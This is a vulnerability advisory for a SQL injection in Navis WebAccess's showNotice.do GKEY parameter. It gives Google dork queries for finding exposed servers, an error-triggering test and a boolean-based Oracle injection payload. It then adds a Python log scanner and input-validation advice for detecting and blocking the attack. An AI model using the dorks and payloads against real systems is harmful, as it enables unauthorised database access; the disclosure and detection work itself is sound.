Navis WebAccess – SQL Injection

GOOGLE

inurl:GKEY= ext:do
inurl:/express/secure/Today.jsp

Vulnerability: SQL Injection
File: /express/showNotice.do
Vulnerable Parameter: GKEY
 
================================================================================================
Test #1
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'
 
 
Response Error:
ORA-00933: SQL command not properly ended
================================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)
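
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags requests to /express/showNotice.do whose decoded GKEY value is not a plain integer, which covers both tests above. Assumptions: legitimate GKEY values are decimal integers (the advisory only shows GKEY=2), the web server writes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
TARGET_PATH = "/express/showNotice.do"
PARAM = "GKEY"

# Assumption: a legitimate GKEY is a plain decimal integer.
NUMERIC = re.compile(r"\d{1,18}")
# Assumption: combined-format access log; capture the request target.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /express/showNotice.do?report_type=1&GKEY=2 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /express/showNotice.do?report_type=1&GKEY=2%27 HTTP/1.1" 500 812',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /express/showNotice.do?report_type=1&GKEY=2%20AND%209753%3D9753 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /express/secure/Today.jsp HTTP/1.1" 200 900',
]

def suspicious_gkey(line):
    """Return the decoded GKEY value if it is not numeric, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Drop any ";jsessionid=..." path parameter before comparing.
    if url.path.split(";")[0] != TARGET_PATH:
        return None
    # parse_qs percent-decodes, so encoded quotes and spaces are seen in clear.
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        if not NUMERIC.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_gkey(line)
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric GKEY -> {value!r}")
```

The same integer-only rule can be enforced server-side before GKEY reaches the query, alongside bind variables, so non-numeric input never reaches the SQL text.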